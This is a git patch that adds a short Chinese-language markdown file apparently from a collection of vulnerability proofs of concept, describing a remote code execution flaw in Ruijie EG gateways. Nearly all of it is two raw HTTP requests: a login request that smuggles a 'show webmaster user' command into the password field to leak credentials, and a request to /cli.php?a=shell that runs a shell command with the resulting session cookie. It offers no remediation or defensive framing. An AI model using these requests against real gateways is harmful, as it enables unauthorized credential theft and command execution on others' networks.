From b845786e3e952315ff4ffc29549569e3abebf1c8 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sun, 20 Aug 2023 09:27:06 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E9=94=90=E6=8D=B7-EG=E6=98=93?=
 =?UTF-8?q?=E7=BD=91=E5=85=B3=E5=AD=98=E5=9C=A8RCE=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 锐捷-EG易网关存在RCE漏洞.md | 25 +++++++++++++++++++++++++
 1 file changed, 25 insertions(+)
 create mode 100644 锐捷-EG易网关存在RCE漏洞.md

diff --git a/锐捷-EG易网关存在RCE漏洞.md b/锐捷-EG易网关存在RCE漏洞.md
new file mode 100644
index 0000000..9712132
--- /dev/null
+++ b/锐捷-EG易网关存在RCE漏洞.md
@@ -0,0 +1,25 @@
+##  锐捷-EG易网关存在RCE漏洞
+```
+获取用户密码
+POST /login.php HTTP/1.1
+Host: 10.10.10.10
+User-Agent: Go-http-client/1.1
+Content-Length: 49
+Content-Type: application/x-www-form-urlencoded
+X-Requested-With: XMLHttpRequest
+Accept-Encoding: gzip
+
+username=admin&password=admin?show+webmaster+user
+
+命令执行
+POST /cli.php?a=shell HTTP/1.1
+Host: 10.10.10.10
+User-Agent: Go-http-client/1.1
+Content-Length: 24
+Content-Type: application/x-www-form-urlencoded
+Cookie: 利用登录后Cookie的RUIJIEID字段进行替换，;user=admin; 
+X-Requested-With: XMLHttpRequest
+Accept-Encoding: gzip
+
+notdelay=true&command=ls
+```